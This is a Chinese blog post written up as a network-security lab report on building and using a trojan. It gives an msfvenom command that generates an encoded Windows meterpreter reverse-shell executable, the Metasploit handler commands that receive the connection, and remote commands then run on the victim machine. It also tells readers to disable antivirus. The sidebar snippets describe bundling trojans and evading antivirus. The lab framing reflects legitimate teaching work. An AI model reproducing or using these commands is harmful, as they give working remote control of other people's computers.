木马病毒制作及分析

最新推荐文章于 2024-07-04 11:12:02 发布
最新推荐文章于 2024-07-04 11:12:02 发布
阅读量1.8w 收藏 132
点赞数 15
分类专栏: 计算机病毒 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785457/article/details/121141253
版权
  • 实验目的

本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容:

(1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击;

(2) 利用网络安全工具或设备对入侵与攻击进行检测;

注意事项

1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。

2.若在个人电脑上实验,最好在虚拟机中运行。

3.测试完毕后,请注意病毒程序的清除,以免误操作破坏计算机上的其他程序。

4.请勿传播该木马。传播该病毒造成有用数据丢失、电脑故障甚至触犯法律等后果,由传播者负责。

  • 实验要求

Windows系统 、kalilinux系统、vmware等

  • 实验内容

    利用kali 生成木马并执行,攻击机kali的ip地址192.168.6.50 ,受害机的server ip地址192.168.6.100.

   参考如图:

    

四、实验步骤

1、使用kali生成木马,木马程序名nxlgwg.exe

   root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.43.25  LPORT=4444  -f  exe > nxlgwg.exe

操作截图

检查/root/目录下是否生成木马

操作截图

 

2、将生成的木马程序名拷贝到受害机上 (方法很多,可以使用putty或者WISCP)也可利用虚拟与主机之间可以复制文件进行文件copy。

操作截图

将其拷贝出来,将其复制到server主机之上。

3、在kali系统中实施攻击,调用MSF工具进行攻击

打开 Metasploit 工具,直接搜索即可。

参照上图选择工具

然后依次输入以下命令

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.6.50
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

 

输入shell 等待受害机点击木马

操作截图

  1. 确认受害机被远程控制

通过 kail 进行攻击   

 在受害机桌面上建立文件夹(使用mkdir命令建立任一文件夹)

操作截图

 

对受害机进行设定60秒关机操作(shutdown –s –t 60)

  

取消关机操作 shutdown –a

核查受害机的任务进程,确认木马正在运行

操作截图

核查受害机当前端口打开情况(使用netstat 命令检查4444端口被打开)

操作截图

张起灵0220
关注
  • 15
    点赞
  • 132
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
android木马的制作方法,实现木马病毒的详细步骤
weixin_28292761的博客
05-27 1万+
前言:有没有遇到过这种情况,打开邮件,发现一封非常正常的邮件,附带了连接,你不以为然的点进去,结果中木马病毒了,这个套路是不是很熟悉,也很老套,但稍不注意就容易中木马病毒,希拉里邮件门事件不就是这样么?!作为一名程序员,你是否想过怎样实现这样一个木马病毒呢?来吧,这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理,带你一步步了解如何制作一...
加壳formbook病毒分析中间文件
02-08
通过de4dot,可以尝试还原混淆的代码,便于分析制作有效的签名,用于反病毒软件识别和阻止Formbook病毒。 在整个分析过程中,除了使用专业工具外,还需要深厚的安全知识和经验。逆向工程师必须能够理解和解析汇编...
如何编写木马病毒
热门推荐
特权份子的专栏
09-30 9万+
如何编写木马病毒 www.hxhack.com 阅读:1434 时间:2007-7-23 9:46:39 整理:华夏黑盟 ------------------------------------------------------------------
C语言写病毒,木马
mypaomian
07-25 1万+
以前在网吧花了大投资的游戏账号被心痛的盗过一次,于是到了大学就傻逼傻逼的想写病毒,木马,出出风头,然后到处到处搜索,相关方法,以为这样就能写出病毒木马。一直持续到前段日子,偶尔看到一本关于杀毒软件是怎么查杀木马的资料,才知晓 自己当时的做法是多么的愚蠢,当时想到的一些方法,很多年
【阿一网络安全】压缩文件木马制作
最新发布
Ayixy的博客
07-04 157
自解压文件选项 ②在安装选项卡里的安装选项卡下添加解压缩后运行的程序。将这三个添加到压缩文件,将名称改为正常的压缩包文件名。里面可以看到已经上线成功,拿到了这台机器的控制权了。文件 他会将我们正常的安装包和后门程序还有这个。下面这个路径不填默认就在当前目录下解压了。本机测试被火绒拦截了,需要做免杀。文件,然后需要将原本的图标替换掉。现在就已经替换好了,记得要保存。里建立了一个监听,监听端口为。是正常的压缩包和木马文件)(制作后门文件与监听)(捆绑压缩木马文件)
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 541
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
怎么做一个木马
wuli1024的博客
01-27 2967
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
木马程序的制作
自学编程_youkewang.top
03-08 3万+
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作. 实验环境:一台Win7SP1和一台WinXPsp3+Backtrack5. 使用工具有:msfpayload+msfencode.   0x01:使用msfpayload windows/mete
一款木马的分析
03-21 1197
 by nbw4 NE365  为了配合kanxue老大倡议的多发文,加上近来有些乏,找个别的东西分析一下耍耍。随便从网上下了个木马生成器,是个所谓的下载者,就是Downloader。  名字叫什么 木马基地八一极限下载者,木马么,都喜欢搞得比较牛的样子,其实都比较龌龊,技术和人品一样龌龊。    附件是木马生成器,建议先运行一下看看,生成器无毒。  我下面分析的是这个生成器产生的木马,配置信息就
病毒木马防御与分析
Antz Uhl Kone
01-15 885
病毒木马防御与分析 病毒包和工具包下载:Github 一.前言 二.建立对手动查杀病毒技术的正确认识 1.病毒分析方法 2.病毒查杀步骤 3.必备知识 * 1) 熟悉windows系统进程 * 2) 熟悉常见端口与进程对应关系 * 3) 熟悉windows自带系统服务 * 4) 熟悉注册表启动项位置 三.详解Windows随机启动项目——注...
内核木马及系统启动木马
10-27
### 内核木马及系统启动木马:深入解析与防范策略 #### 一、内核木马(Rootkit)概述 **内核木马**(Rootkit),是一种恶意软件,其主要目的是隐藏自身的存在以及它所服务的其他恶意软件的行为。通过在操作系统的...
C++木马病毒的查杀设计与实现(含源码)
01-28
VC++木马病毒检测工具设计与实现,含毕设要求各种文档及源码 VC++木马病毒检测工具设计与实现,含毕设要求各种文档及源码
通过简单的Dos命令来发现计算机木马病毒
03-03
在网络安全领域,防范木马病毒和恶意软件是至关重要的任务。传统的Dos命令,尽管在现代操作系统中使用较少,但在特定情况下仍然能发挥重要作用,帮助用户检测潜在的安全问题。以下是通过三个基本的Dos命令来检查和...
IFRAME病毒木马清除工具
12-22
这段描述暗示了在2007年12月,可能存在一种特定的IFRAME病毒木马,用户对其感到困扰,因此有开发者或安全团队制作了一款清除工具。同时,"去掉注释部分"可能意味着原始工具中包含了一些调试或解释性的注释,这些注释...
2007年中国计算机病毒疫情调查技术分析报告
12-12
尤其是“熊猫烧香”这类复合型病毒的出现,表明病毒制作者开始利用蠕虫的快速传播能力,结合多种传播途径,以实现更大的经济利益。 总结起来,2007年的报告突显了我国网络安全面临的严峻挑战,密码盗窃、系统瘫痪和...
生成木马病毒
qq_37250297的博客
08-07 6644
一信息收集:     1根据条件生成密码字典:   选择条件的字符     生成对应的字典       对对应的网段进行主机存活扫描: nmap -sP 192.168.183.0/24  分析那个网段是靶子计算机由于本网段的ip为183.129 且网管和服务器占据了183.1和183.2和183.254 剩下的2个ip,由于开了两个网卡,再次我们不妨定下靶子计算机...
木马分析
qq_45157635的博客
06-19 980
木马分析 原理 1.木马是隐藏在正常程序中的具有特殊功能恶意代码,是具备破坏,删除和修改文件,发送密码,记录键盘,实施Dos攻击甚至完全可能告知计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。 2.木马的传统连接技术: 一般木马都采用C/S(client/server,即服务器/客户端)运行模式,因此它分为两部分,即客户端和服务前端木马程序。其原理是,当服务器端程序在目标计算机上被执行后,一般会打开一个默认的端口进行监听,当客户端向服务器端主动提出
一个木马的分析(一)
白菜有罪的专栏
03-02 893
文件MD5:130862496f0fd7a4d6dcb519a06f9f80 分析完毕之后大概的结论有: 1)将自身拷贝到其他文件夹中,然后删除自身 2)结束指定进程,启动宿主进程 3)向系统进程注入代码 4)写启动项注册表 5)下载文件 6)查询DNS信息
木马分析(隐藏分析
要啥啥不行,偷懒第一名
11-03 1127
实验目的&要求: 了解木马隐藏技术的基本原理 提高木马攻击的防范意识 明确木马技术的发展方向 学会使用木马防范的相关工具 实现实验所提到的命令和工具,得到实验结果 预备知识 木马隐藏的技术 程序隐藏: 木马程序隐藏通常指利用各种手段伪装木马程序,让一般用户无法从表面上直接识别出木马程序。要达到这一目的可以通过程序捆绑的方式实现。 程序捆绑方式是将多个exe程序链接在一起组合成一个exe文件,当运行该exe文件时,多个程序同时运行。程序捆绑有多种方式,如将多个exe文件...
windows木马病毒
09-27
木马病毒是一种计算机恶意软件,它通常被伪装成有用的程序或文件,以便欺骗用户进行安装或打开。与传统计算机病毒不同,木马病毒不会自我复制,也不会直接破坏计算机系统。它的目的是在用户不知情的情况下,远程控制受感染的计算机,从而进行各种不法活动,例如窃取个人信息、盗取银行账户、攻击其他计算机等。 根据功能的不同,木马病毒可以分为多种类型。其中包括: 1. 信息窃取木马:该类型的木马病毒主要用于窃取用户的个人信息,例如登录凭证、信用卡信息等。 2. 远程控制木马:这种木马病毒允许攻击者远程控制受感染的计算机,进行各种操作,例如监视用户活动、远程执行命令等。 3. 破坏型木马:这类木马病毒旨在破坏受感染计算机上的文件系统,可能会删除重要数据或导致系统崩溃。 4. 程序杀手木马:这种木马病毒专门用于关闭对方计算机上运行的某些程序,以便为其他木马病毒提供进入的机会。 请注意,以上仅是木马病毒的一些常见类型,实际上木马病毒的形式和功能非常多样化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值